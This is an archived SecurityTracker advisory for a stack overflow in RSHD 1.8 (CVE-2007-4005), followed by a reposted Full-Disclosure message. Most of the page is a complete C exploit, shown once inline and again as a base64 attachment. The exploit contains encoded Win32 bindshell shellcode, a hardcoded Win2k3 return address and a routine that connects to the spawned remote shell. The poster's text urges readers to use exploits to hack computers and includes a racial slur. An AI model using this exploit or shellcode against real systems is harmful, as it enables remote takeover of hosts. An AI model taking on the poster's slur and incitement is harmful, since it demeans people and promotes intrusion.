SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   RSHD Vendors:   rshd.sourceforge.net
RSHD Stack Overflow Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1018459
SecurityTracker URL:  http://securitytracker.com/id/1018459
CVE Reference:   CVE-2007-4005   (Links to External Site)
Updated:  May 6 2008
Original Entry Date:  Jul 25 2007
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.8
Description:   A vulnerability was reported in RSHD. A remote user can execute arbitrary code on the target system.

A remote user can send specially crafted data to trigger a stack overflow and execute arbitrary code on the target system. The code will run with the privileges of the target service.

Joey Mengele reported this vulnerability.

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  rshd.sourceforge.net/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] WabiSabiLabi exploit attached

--Hush_boundary-46a62bef47016
Content-type: text/plain; charset="UTF-8"

Attached and in-line is an exploit for a newly announced item on 
the WabiSabiLabi auction block. I hope this completely devalues the 
item so that the original finder dies of starvation.

DON'T SELL BUGS THROUGH WABISABILABLA

USE EXPLOITS TO HACK COMPUTERS INSTEAD

Exploit is for a stack overflow in http://rshd.sourceforge.net. It 
took about 35 minutes to find the bug and exploit it on Win2k3 
using the information provided to the public by WabiSabiLabi.

Expect exploits for the rest of the auction items in the next week. 
Mayber sooner if Simon @ snosoft.com stops trying to cyber with me 
LOLOLOLOLOLOL niggerdongs.

J

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>

#define ESIZ 1 + 1 + 1 + 1 + 1 + 1028

int
main (int argc, char *argv[])
{
  unsigned char win32_bindshell[] =     // 9999 tcp
    "AAAAAAAAAAAAA"
    
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
    
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x37\x5a\x6a\x66"
    
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x76\x41\x32\x41\x41\x32"
    
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x79\x79\x4b\x4c\x32"
    
"\x4a\x7a\x4b\x42\x6d\x78\x68\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f\x75"
    
"\x30\x6e\x6b\x42\x4c\x45\x74\x71\x34\x6c\x4b\x41\x55\x57\x4c\x4e"
    
"\x6b\x33\x4c\x53\x35\x51\x68\x55\x51\x68\x6f\x4c\x4b\x72\x6f\x56"
    
"\x78\x6e\x6b\x61\x4f\x77\x50\x76\x61\x38\x6b\x52\x69\x4e\x6b\x36"
    
"\x54\x4e\x6b\x67\x71\x4a\x4e\x76\x51\x4f\x30\x6d\x49\x4e\x4c\x4d"
    
"\x54\x4b\x70\x41\x64\x43\x37\x4b\x71\x6b\x7a\x76\x6d\x54\x41\x4f"
    
"\x32\x7a\x4b\x6a\x54\x45\x6b\x33\x64\x56\x44\x77\x58\x34\x35\x6b"
    
"\x55\x4c\x4b\x61\x4f\x46\x44\x55\x51\x58\x6b\x31\x76\x6c\x4b\x46"
    
"\x6c\x30\x4b\x4e\x6b\x61\x4f\x75\x4c\x64\x41\x38\x6b\x53\x33\x54"
    
"\x6c\x4c\x4b\x6d\x59\x50\x6c\x64\x64\x55\x4c\x30\x61\x6b\x73\x74"
    
"\x71\x4b\x6b\x51\x74\x4c\x4b\x51\x53\x70\x30\x4c\x4b\x77\x30\x36"
    
"\x6c\x4c\x4b\x72\x50\x35\x4c\x4e\x4d\x6c\x4b\x73\x70\x57\x78\x31"
    
"\x4e\x42\x48\x4e\x6e\x50\x4e\x76\x6e\x5a\x4c\x30\x50\x6b\x4f\x49"
    
"\x46\x75\x36\x56\x33\x53\x56\x75\x38\x37\x43\x34\x72\x35\x38\x74"
    
"\x37\x54\x33\x44\x72\x63\x6f\x71\x44\x4b\x4f\x7a\x70\x42\x48\x38"
    
"\x4b\x38\x6d\x6b\x4c\x47\x4b\x30\x50\x4b\x4f\x4e\x36\x51\x4f\x4f"
    
"\x79\x4d\x35\x42\x46\x4b\x31\x7a\x4d\x33\x38\x57\x72\x76\x35\x61"
    
"\x7a\x46\x62\x4b\x4f\x6e\x30\x51\x78\x4b\x69\x67\x79\x59\x65\x6c"
    
"\x6d\x41\x47\x4b\x4f\x6e\x36\x41\x43\x56\x33\x76\x33\x52\x73\x70"
    
"\x53\x51\x53\x70\x53\x32\x63\x32\x73\x6b\x4f\x4e\x30\x41\x76\x62"
    
"\x48\x36\x47\x54\x4f\x41\x76\x72\x73\x4f\x79\x49\x71\x4e\x75\x31"
    
"\x78\x6e\x44\x67\x6a\x64\x30\x4f\x37\x70\x57\x69\x6f\x6e\x36\x70"
    
"\x6a\x74\x50\x62\x71\x73\x65\x4b\x4f\x38\x50\x62\x48\x4c\x64\x4e"
    
"\x4d\x64\x6e\x58\x69\x62\x77\x4b\x4f\x7a\x76\x50\x53\x51\x45\x39"
    
"\x6f\x58\x50\x71\x78\x6b\x55\x53\x79\x6f\x76\x53\x79\x36\x37\x39"
    
"\x6f\x79\x46\x72\x70\x61\x44\x33\x64\x62\x75\x59\x6f\x48\x50\x4a"
    
"\x33\x51\x78\x6d\x37\x71\x69\x79\x56\x71\x69\x70\x57\x6b\x4f\x6e"
    
"\x36\x51\x45\x69\x6f\x6e\x30\x45\x36\x63\x5a\x41\x74\x35\x36\x72"
    
"\x48\x30\x63\x50\x6d\x6f\x79\x59\x75\x63\x5a\x52\x70\x43\x69\x37"
    
"\x59\x58\x4c\x4f\x79\x79\x77\x52\x4a\x33\x74\x4d\x59\x39\x72\x55"
    
"\x61\x4f\x30\x7a\x53\x6d\x7a\x79\x6e\x47\x32\x76\x4d\x69\x6e\x47"
    
"\x32\x34\x6c\x6d\x43\x6c\x4d\x72\x5a\x54\x78\x4e\x4b\x4c\x6b\x6c"
    
"\x6b\x75\x38\x52\x52\x4b\x4e\x4e\x53\x55\x46\x79\x6f\x71\x65\x41"
    
"\x54\x59\x6f\x4e\x36\x43\x6b\x71\x47\x51\x42\x52\x71\x62\x71\x52"
    
"\x71\x51\x7a\x33\x31\x56\x31\x46\x31\x51\x45\x50\x51\x59\x6f\x4e"
    
"\x30\x50\x68\x4c\x6d\x6e\x39\x53\x35\x6a\x6e\x62\x73\x49\x6f\x5a"
    
"\x76\x50\x6a\x59\x6f\x4b\x4f\x34\x77\x59\x6f\x5a\x70\x6c\x4b\x32"
    
"\x77\x39\x6c\x6c\x43\x4b\x74\x61\x74\x6b\x4f\x6a\x76\x50\x52\x79"
    
"\x6f\x6e\x30\x42\x48\x7a\x4f\x6a\x6e\x59\x70\x63\x50\x42\x73\x4b"
    "\x4f\x48\x56\x79\x6f\x4e\x30\x66";

  char *buf;
  int *ptr;
  int i, c, sck;
  struct sockaddr_in address;
  struct hostent *hp;

  if (argc < 2)
    {
      printf ("usage: %s address\n", argv[0]);
      exit (-1);
    }
// lsd-pl arrayd.c
  sck = socket (AF_INET, SOCK_STREAM, 0);
  bzero (&address, sizeof (address));
  address.sin_family = AF_INET;
  address.sin_port = htons (514);
  if (0 !=
      bind (sck, (struct sockaddr *) &address, sizeof (struct 
sockaddr_in)))
    {
      perror ("bind");
      exit (-344);
    }
  if ((address.sin_addr.s_addr = inet_addr (argv[1])) == -1)
    {
      if ((hp = gethostbyname (argv[1])) == NULL)
        {
          errno = EADDRNOTAVAIL;
          perror ("error");
          exit (-1);
        }
      memcpy (&address.sin_addr.s_addr, hp->h_addr, 4);
    }
  if (connect (sck, (struct sockaddr *) &address, sizeof (address)) 
< 0)
    {
      perror ("error");
      exit (-1);
    }
  buf = malloc (ESIZ);
  memcpy (buf, "\x00\x41\x00\x41\x00", 5);
  memset (buf + 5, 0x41, 1028);
  memcpy (buf + 5, win32_bindshell, sizeof (win32_bindshell) - 1);
  ptr = (int *) (buf + 5 + 1024);
  *ptr = 0x71ae36b7;            // call esi in wshtcpip in win2k3 
SP1
  write (sck, buf, ESIZ);
  close (sck);
  sleep (1);

  sck = socket (AF_INET, SOCK_STREAM, 0);
  bzero (&address, sizeof (address));
  address.sin_family = AF_INET;
  address.sin_port = htons (9999);
  if ((address.sin_addr.s_addr = inet_addr (argv[1])) == -1)
    {
      if ((hp = gethostbyname (argv[1])) == NULL)
        {
          errno = EADDRNOTAVAIL;
          perror ("error");
          exit (-1);
        }
      memcpy (&address.sin_addr.s_addr, hp->h_addr, 4);
    }
  if (connect (sck, (struct sockaddr *) &address, sizeof (address)) 
< 0)
    {
      perror ("error");
      exit (-1);
    }
  do_shell (sck);

}

// cvs_linux_freebsd_HEAP.c
int
do_shell (int sockfd)
{
  while (1)
    {
      fd_set fds;
      FD_ZERO (&fds);
      FD_SET (0, &fds);
      FD_SET (sockfd, &fds);
      if (select (FD_SETSIZE, &fds, NULL, NULL, NULL))
        {
          int cnt;
          char buf[1024];
          if (FD_ISSET (0, &fds))
            {
              if ((cnt = read (0, buf, 1024)) < 1)
                {
                  if (errno == EWOULDBLOCK || errno == EAGAIN)
                    continue;
                  else
                    break;
                }
              write (sockfd, buf, cnt);
            }
          if (FD_ISSET (sockfd, &fds))
            {
              if ((cnt = read (sockfd, buf, 1024)) < 1)
                {
                  if (errno == EWOULDBLOCK || errno == EAGAIN)
                    continue;
                  else
                    break;
                }
              write (1, buf, cnt);
            }
        }
    }
}

--
HASH(0x8bd74b8)
HASH(0x8be1f04)
http://tagline.hushmail.com/fc/Ioyw6h4dDc4UON6zqXkGxAhIsRJpEIRTCbGHNG9XzVUzxmwK74FXc8/




--Hush_boundary-46a62bef47016
Content-type: application/octet-stream; name="exploit.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="exploit.c"

I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lz
L3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxuZXRkYi5oPg0K
I2luY2x1ZGUgPGVycm5vLmg+DQoNCiNkZWZpbmUgRVNJWiAxICsgMSArIDEgKyAxICsgMSArIDEw
MjgNCg0KaW50DQptYWluIChpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0KICB1bnNpZ25lZCBj
aGFyIHdpbjMyX2JpbmRzaGVsbFtdID0JLy8gOTk5OSB0Y3ANCiAgICAiQUFBQUFBQUFBQUFBQSIN
CiAgICAiXHhlYlx4MDNceDU5XHhlYlx4MDVceGU4XHhmOFx4ZmZceGZmXHhmZlx4NDlceDQ5XHg0
OVx4NDlceDQ5XHg0OSINCiAgICAiXHg0OVx4NDlceDQ5XHg0OVx4NDlceDQ5XHg0OVx4NDlceDQ5
XHg0OVx4NDlceDUxXHgzN1x4NWFceDZhXHg2NiINCiAgICAiXHg1OFx4NTBceDMwXHg0MVx4MzFc
eDQyXHg0MVx4NmJceDQxXHg0MVx4NzZceDQxXHgzMlx4NDFceDQxXHgzMiINCiAgICAiXHg0Mlx4
NDFceDMwXHg0Mlx4NDFceDU4XHg1MFx4MzhceDQxXHg0Mlx4NzVceDc5XHg3OVx4NGJceDRjXHgz
MiINCiAgICAiXHg0YVx4N2FceDRiXHg0Mlx4NmRceDc4XHg2OFx4NGNceDM5XHg0Ylx4NGZceDRi
XHg0Zlx4NGJceDRmXHg3NSINCiAgICAiXHgzMFx4NmVceDZiXHg0Mlx4NGNceDQ1XHg3NFx4NzFc
eDM0XHg2Y1x4NGJceDQxXHg1NVx4NTdceDRjXHg0ZSINCiAgICAiXHg2Ylx4MzNceDRjXHg1M1x4
MzVceDUxXHg2OFx4NTVceDUxXHg2OFx4NmZceDRjXHg0Ylx4NzJceDZmXHg1NiINCiAgICAiXHg3
OFx4NmVceDZiXHg2MVx4NGZceDc3XHg1MFx4NzZceDYxXHgzOFx4NmJceDUyXHg2OVx4NGVceDZi
XHgzNiINCiAgICAiXHg1NFx4NGVceDZiXHg2N1x4NzFceDRhXHg0ZVx4NzZceDUxXHg0Zlx4MzBc
eDZkXHg0OVx4NGVceDRjXHg0ZCINCiAgICAiXHg1NFx4NGJceDcwXHg0MVx4NjRceDQzXHgzN1x4
NGJceDcxXHg2Ylx4N2FceDc2XHg2ZFx4NTRceDQxXHg0ZiINCiAgICAiXHgzMlx4N2FceDRiXHg2
YVx4NTRceDQ1XHg2Ylx4MzNceDY0XHg1Nlx4NDRceDc3XHg1OFx4MzRceDM1XHg2YiINCiAgICAi
XHg1NVx4NGNceDRiXHg2MVx4NGZceDQ2XHg0NFx4NTVceDUxXHg1OFx4NmJceDMxXHg3Nlx4NmNc
eDRiXHg0NiINCiAgICAiXHg2Y1x4MzBceDRiXHg0ZVx4NmJceDYxXHg0Zlx4NzVceDRjXHg2NFx4
NDFceDM4XHg2Ylx4NTNceDMzXHg1NCINCiAgICAiXHg2Y1x4NGNceDRiXHg2ZFx4NTlceDUwXHg2
Y1x4NjRceDY0XHg1NVx4NGNceDMwXHg2MVx4NmJceDczXHg3NCINCiAgICAiXHg3MVx4NGJceDZi
XHg1MVx4NzRceDRjXHg0Ylx4NTFceDUzXHg3MFx4MzBceDRjXHg0Ylx4NzdceDMwXHgzNiINCiAg
ICAiXHg2Y1x4NGNceDRiXHg3Mlx4NTBceDM1XHg0Y1x4NGVceDRkXHg2Y1x4NGJceDczXHg3MFx4
NTdceDc4XHgzMSINCiAgICAiXHg0ZVx4NDJceDQ4XHg0ZVx4NmVceDUwXHg0ZVx4NzZceDZlXHg1
YVx4NGNceDMwXHg1MFx4NmJceDRmXHg0OSINCiAgICAiXHg0Nlx4NzVceDM2XHg1Nlx4MzNceDUz
XHg1Nlx4NzVceDM4XHgzN1x4NDNceDM0XHg3Mlx4MzVceDM4XHg3NCINCiAgICAiXHgzN1x4NTRc
eDMzXHg0NFx4NzJceDYzXHg2Zlx4NzFceDQ0XHg0Ylx4NGZceDdhXHg3MFx4NDJceDQ4XHgzOCIN
CiAgICAiXHg0Ylx4MzhceDZkXHg2Ylx4NGNceDQ3XHg0Ylx4MzBceDUwXHg0Ylx4NGZceDRlXHgz
Nlx4NTFceDRmXHg0ZiINCiAgICAiXHg3OVx4NGRceDM1XHg0Mlx4NDZceDRiXHgzMVx4N2FceDRk
XHgzM1x4MzhceDU3XHg3Mlx4NzZceDM1XHg2MSINCiAgICAiXHg3YVx4NDZceDYyXHg0Ylx4NGZc
eDZlXHgzMFx4NTFceDc4XHg0Ylx4NjlceDY3XHg3OVx4NTlceDY1XHg2YyINCiAgICAiXHg2ZFx4
NDFceDQ3XHg0Ylx4NGZceDZlXHgzNlx4NDFceDQzXHg1Nlx4MzNceDc2XHgzM1x4NTJceDczXHg3
MCINCiAgICAiXHg1M1x4NTFceDUzXHg3MFx4NTNceDMyXHg2M1x4MzJceDczXHg2Ylx4NGZceDRl
XHgzMFx4NDFceDc2XHg2MiINCiAgICAiXHg0OFx4MzZceDQ3XHg1NFx4NGZceDQxXHg3Nlx4NzJc
eDczXHg0Zlx4NzlceDQ5XHg3MVx4NGVceDc1XHgzMSINCiAgICAiXHg3OFx4NmVceDQ0XHg2N1x4
NmFceDY0XHgzMFx4NGZceDM3XHg3MFx4NTdceDY5XHg2Zlx4NmVceDM2XHg3MCINCiAgICAiXHg2
YVx4NzRceDUwXHg2Mlx4NzFceDczXHg2NVx4NGJceDRmXHgzOFx4NTBceDYyXHg0OFx4NGNceDY0
XHg0ZSINCiAgICAiXHg0ZFx4NjRceDZlXHg1OFx4NjlceDYyXHg3N1x4NGJceDRmXHg3YVx4NzZc
eDUwXHg1M1x4NTFceDQ1XHgzOSINCiAgICAiXHg2Zlx4NThceDUwXHg3MVx4NzhceDZiXHg1NVx4
NTNceDc5XHg2Zlx4NzZceDUzXHg3OVx4MzZceDM3XHgzOSINCiAgICAiXHg2Zlx4NzlceDQ2XHg3
Mlx4NzBceDYxXHg0NFx4MzNceDY0XHg2Mlx4NzVceDU5XHg2Zlx4NDhceDUwXHg0YSINCiAgICAi
XHgzM1x4NTFceDc4XHg2ZFx4MzdceDcxXHg2OVx4NzlceDU2XHg3MVx4NjlceDcwXHg1N1x4NmJc
eDRmXHg2ZSINCiAgICAiXHgzNlx4NTFceDQ1XHg2OVx4NmZceDZlXHgzMFx4NDVceDM2XHg2M1x4
NWFceDQxXHg3NFx4MzVceDM2XHg3MiINCiAgICAiXHg0OFx4MzBceDYzXHg1MFx4NmRceDZmXHg3
OVx4NTlceDc1XHg2M1x4NWFceDUyXHg3MFx4NDNceDY5XHgzNyINCiAgICAiXHg1OVx4NThceDRj
XHg0Zlx4NzlceDc5XHg3N1x4NTJceDRhXHgzM1x4NzRceDRkXHg1OVx4MzlceDcyXHg1NSINCiAg
ICAiXHg2MVx4NGZceDMwXHg3YVx4NTNceDZkXHg3YVx4NzlceDZlXHg0N1x4MzJceDc2XHg0ZFx4
NjlceDZlXHg0NyINCiAgICAiXHgzMlx4MzRceDZjXHg2ZFx4NDNceDZjXHg0ZFx4NzJceDVhXHg1
NFx4NzhceDRlXHg0Ylx4NGNceDZiXHg2YyINCiAgICAiXHg2Ylx4NzVceDM4XHg1Mlx4NTJceDRi
XHg0ZVx4NGVceDUzXHg1NVx4NDZceDc5XHg2Zlx4NzFceDY1XHg0MSINCiAgICAiXHg1NFx4NTlc
eDZmXHg0ZVx4MzZceDQzXHg2Ylx4NzFceDQ3XHg1MVx4NDJceDUyXHg3MVx4NjJceDcxXHg1MiIN
CiAgICAiXHg3MVx4NTFceDdhXHgzM1x4MzFceDU2XHgzMVx4NDZceDMxXHg1MVx4NDVceDUwXHg1
MVx4NTlceDZmXHg0ZSINCiAgICAiXHgzMFx4NTBceDY4XHg0Y1x4NmRceDZlXHgzOVx4NTNceDM1
XHg2YVx4NmVceDYyXHg3M1x4NDlceDZmXHg1YSINCiAgICAiXHg3Nlx4NTBceDZhXHg1OVx4NmZc
eDRiXHg0Zlx4MzRceDc3XHg1OVx4NmZceDVhXHg3MFx4NmNceDRiXHgzMiINCiAgICAiXHg3N1x4
MzlceDZjXHg2Y1x4NDNceDRiXHg3NFx4NjFceDc0XHg2Ylx4NGZceDZhXHg3Nlx4NTBceDUyXHg3
OSINCiAgICAiXHg2Zlx4NmVceDMwXHg0Mlx4NDhceDdhXHg0Zlx4NmFceDZlXHg1OVx4NzBceDYz
XHg1MFx4NDJceDczXHg0YiINCiAgICAiXHg0Zlx4NDhceDU2XHg3OVx4NmZceDRlXHgzMFx4NjYi
Ow0KDQogIGNoYXIgKmJ1ZjsNCiAgaW50ICpwdHI7DQogIGludCBpLCBjLCBzY2s7DQogIHN0cnVj
dCBzb2NrYWRkcl9pbiBhZGRyZXNzOw0KICBzdHJ1Y3QgaG9zdGVudCAqaHA7DQoNCiAgaWYgKGFy
Z2MgPCAyKQ0KICAgIHsNCiAgICAgIHByaW50ZiAoInVzYWdlOiAlcyBhZGRyZXNzXG4iLCBhcmd2
WzBdKTsNCiAgICAgIGV4aXQgKC0xKTsNCiAgICB9DQovLyBsc2QtcGwgYXJyYXlkLmMNCiAgc2Nr
ID0gc29ja2V0IChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCk7DQogIGJ6ZXJvICgmYWRkcmVzcywg
c2l6ZW9mIChhZGRyZXNzKSk7DQogIGFkZHJlc3Muc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogIGFk
ZHJlc3Muc2luX3BvcnQgPSBodG9ucyAoNTE0KTsNCiAgaWYgKDAgIT0NCiAgICAgIGJpbmQgKHNj
aywgKHN0cnVjdCBzb2NrYWRkciAqKSAmYWRkcmVzcywgc2l6ZW9mIChzdHJ1Y3Qgc29ja2FkZHJf
aW4pKSkNCiAgICB7DQogICAgICBwZXJyb3IgKCJiaW5kIik7DQogICAgICBleGl0ICgtMzQ0KTsN
CiAgICB9DQogIGlmICgoYWRkcmVzcy5zaW5fYWRkci5zX2FkZHIgPSBpbmV0X2FkZHIgKGFyZ3Zb
MV0pKSA9PSAtMSkNCiAgICB7DQogICAgICBpZiAoKGhwID0gZ2V0aG9zdGJ5bmFtZSAoYXJndlsx
XSkpID09IE5VTEwpDQoJew0KCSAgZXJybm8gPSBFQUREUk5PVEFWQUlMOw0KCSAgcGVycm9yICgi
ZXJyb3IiKTsNCgkgIGV4aXQgKC0xKTsNCgl9DQogICAgICBtZW1jcHkgKCZhZGRyZXNzLnNpbl9h
ZGRyLnNfYWRkciwgaHAtPmhfYWRkciwgNCk7DQogICAgfQ0KICBpZiAoY29ubmVjdCAoc2NrLCAo
c3RydWN0IHNvY2thZGRyICopICZhZGRyZXNzLCBzaXplb2YgKGFkZHJlc3MpKSA8IDApDQogICAg
ew0KICAgICAgcGVycm9yICgiZXJyb3IiKTsNCiAgICAgIGV4aXQgKC0xKTsNCiAgICB9DQogIGJ1
ZiA9IG1hbGxvYyAoRVNJWik7DQogIG1lbWNweSAoYnVmLCAiXHgwMFx4NDFceDAwXHg0MVx4MDAi
LCA1KTsNCiAgbWVtc2V0IChidWYgKyA1LCAweDQxLCAxMDI4KTsNCiAgbWVtY3B5IChidWYgKyA1
LCB3aW4zMl9iaW5kc2hlbGwsIHNpemVvZiAod2luMzJfYmluZHNoZWxsKSAtIDEpOw0KICBwdHIg
PSAoaW50ICopIChidWYgKyA1ICsgMTAyNCk7DQogICpwdHIgPSAweDcxYWUzNmI3OwkJLy8gY2Fs
bCBlc2kgaW4gd3NodGNwaXAgaW4gd2luMmszIFNQMQ0KICB3cml0ZSAoc2NrLCBidWYsIEVTSVop
Ow0KICBjbG9zZSAoc2NrKTsNCiAgc2xlZXAgKDEpOw0KDQogIHNjayA9IHNvY2tldCAoQUZfSU5F
VCwgU09DS19TVFJFQU0sIDApOw0KICBiemVybyAoJmFkZHJlc3MsIHNpemVvZiAoYWRkcmVzcykp
Ow0KICBhZGRyZXNzLnNpbl9mYW1pbHkgPSBBRl9JTkVUOw0KICBhZGRyZXNzLnNpbl9wb3J0ID0g
aHRvbnMgKDk5OTkpOw0KICBpZiAoKGFkZHJlc3Muc2luX2FkZHIuc19hZGRyID0gaW5ldF9hZGRy
IChhcmd2WzFdKSkgPT0gLTEpDQogICAgew0KICAgICAgaWYgKChocCA9IGdldGhvc3RieW5hbWUg
KGFyZ3ZbMV0pKSA9PSBOVUxMKQ0KCXsNCgkgIGVycm5vID0gRUFERFJOT1RBVkFJTDsNCgkgIHBl
cnJvciAoImVycm9yIik7DQoJICBleGl0ICgtMSk7DQoJfQ0KICAgICAgbWVtY3B5ICgmYWRkcmVz
cy5zaW5fYWRkci5zX2FkZHIsIGhwLT5oX2FkZHIsIDQpOw0KICAgIH0NCiAgaWYgKGNvbm5lY3Qg
KHNjaywgKHN0cnVjdCBzb2NrYWRkciAqKSAmYWRkcmVzcywgc2l6ZW9mIChhZGRyZXNzKSkgPCAw
KQ0KICAgIHsNCiAgICAgIHBlcnJvciAoImVycm9yIik7DQogICAgICBleGl0ICgtMSk7DQogICAg
fQ0KICBkb19zaGVsbCAoc2NrKTsNCg0KfQ0KDQovLyBjdnNfbGludXhfZnJlZWJzZF9IRUFQLmMN
CmludA0KZG9fc2hlbGwgKGludCBzb2NrZmQpDQp7DQogIHdoaWxlICgxKQ0KICAgIHsNCiAgICAg
IGZkX3NldCBmZHM7DQogICAgICBGRF9aRVJPICgmZmRzKTsNCiAgICAgIEZEX1NFVCAoMCwgJmZk
cyk7DQogICAgICBGRF9TRVQgKHNvY2tmZCwgJmZkcyk7DQogICAgICBpZiAoc2VsZWN0IChGRF9T
RVRTSVpFLCAmZmRzLCBOVUxMLCBOVUxMLCBOVUxMKSkNCgl7DQoJICBpbnQgY250Ow0KCSAgY2hh
ciBidWZbMTAyNF07DQoJICBpZiAoRkRfSVNTRVQgKDAsICZmZHMpKQ0KCSAgICB7DQoJICAgICAg
aWYgKChjbnQgPSByZWFkICgwLCBidWYsIDEwMjQpKSA8IDEpDQoJCXsNCgkJICBpZiAoZXJybm8g
PT0gRVdPVUxEQkxPQ0sgfHwgZXJybm8gPT0gRUFHQUlOKQ0KCQkgICAgY29udGludWU7DQoJCSAg
ZWxzZQ0KCQkgICAgYnJlYWs7DQoJCX0NCgkgICAgICB3cml0ZSAoc29ja2ZkLCBidWYsIGNudCk7
DQoJICAgIH0NCgkgIGlmIChGRF9JU1NFVCAoc29ja2ZkLCAmZmRzKSkNCgkgICAgew0KCSAgICAg
IGlmICgoY250ID0gcmVhZCAoc29ja2ZkLCBidWYsIDEwMjQpKSA8IDEpDQoJCXsNCgkJICBpZiAo
ZXJybm8gPT0gRVdPVUxEQkxPQ0sgfHwgZXJybm8gPT0gRUFHQUlOKQ0KCQkgICAgY29udGludWU7
DQoJCSAgZWxzZQ0KCQkgICAgYnJlYWs7DQoJCX0NCgkgICAgICB3cml0ZSAoMSwgYnVmLCBjbnQp
Ow0KCSAgICB9DQoJfQ0KICAgIH0NCn0NCg==

--Hush_boundary-46a62bef47016
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--Hush_boundary-46a62bef47016--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC